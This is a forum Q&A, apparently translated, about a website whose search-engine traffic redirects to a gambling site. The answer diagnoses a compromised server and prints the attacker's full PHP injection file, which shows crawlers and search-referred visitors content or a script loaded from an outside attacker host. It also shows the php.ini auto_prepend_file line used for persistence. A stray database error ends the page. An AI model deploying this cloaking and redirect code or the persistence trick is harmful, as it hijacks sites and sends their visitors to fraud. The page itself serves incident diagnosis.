The website has been hijacked by search, is there any solution?

abc represents a website.

search for abc on Baidu or Sogou, and then click the first link, which will jump to the gambling website.

is there any solution? Thank you.

Sep.19,2021

the server was indeed hacked and the php.ini was modified.

Resolution process

We searched the server for the keyword 8ybct and found that it exists in the file eaccelerator-86746.042 . By looking at this file, we found the / tmp/sess_vqm0cd7f5f8as9ad7sdxs2167 file. Opening this file is harmful code:

<?php
  $keyword = "";
  $url = 'http://8ybct.com/jiechi/abc.jpg';
  $passurl = "http://8ybct.com/jiechi/abc.js";
  $robot = 0;
  $refer = 0;
  $arrKeyword = explode("|",$keyword);
  $USER_AGENT = strtolower($_SERVER['HTTP_USER_AGENT']);

  if(empty($_SERVER['HTTP_REFERER'])){
          $HTTP_Referer = "n";
  }
  else{
          $HTTP_Referer = strtolower(urldecode($_SERVER['HTTP_REFERER']));
  }

  if(strpos($USER_AGENT,"bot"))
    $robot = 1;

  if(strpos($USER_AGENT,"spider"))
    $robot = 1;

  if(strpos($USER_AGENT,"slurp"))
    $robot = 1;

  if(strpos($USER_AGENT,"mediapartners-google"))
    $robot = 1;

  if($robot == 1 && $_SERVER['REQUEST_URI'] == "/discuss/member.php?mod=logging&action=login&mobile=2"){
        //Header("Location: ".$url);
        echo file_get_contents($url);
        exit;
  }

  if($robot == 1 && $_SERVER['REQUEST_URI'] == "/"){
        //Header("Location: ".$url);
        echo file_get_contents($url);
        exit;
  }

  if(strpos($HTTP_Referer,"www.baidu.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"soso.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"sogou.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"so.com/"))
    $refer = 1;

  if(strpos($HTTP_Referer,"baidu.com"))
    $refer = 1;

  if($refer == 1 && $_SERVER['REQUEST_URI'] == "/discuss/member.php?mod=logging&action=login&mobile=2"){
  echo '<script src="'.$passurl.'"></script>';
  exit;
  }

  if($refer == 1 && $_SERVER['REQUEST_URI'] == "/"){
  echo '<script src="'.$passurl.'"></script>';
  exit;
  }

?>

the hacker added this configuration item by modifying php.ini,:

auto_prepend_file="/tmp/sess_vqm0cd7f5f8as9ad7sdxs2167"

that is, every time a user requests a website, the hacker's code will be added to the page header. Because this code determines the source link, as long as it is Baidu or Sogou's source, it will return the hacker's jump script, that is, jump to the gambling website.


you can use to add a https certificate to the website

MySQL Query : SELECT * FROM `codeshelper`.`v9_news` WHERE status=99 AND catid='6' ORDER BY rand() LIMIT 5
MySQL Error : Disk full (/tmp/#sql-temptable-64f5-1e463eb-44b8f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
MySQL Errno : 1021
Message : Disk full (/tmp/#sql-temptable-64f5-1e463eb-44b8f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
Need Help?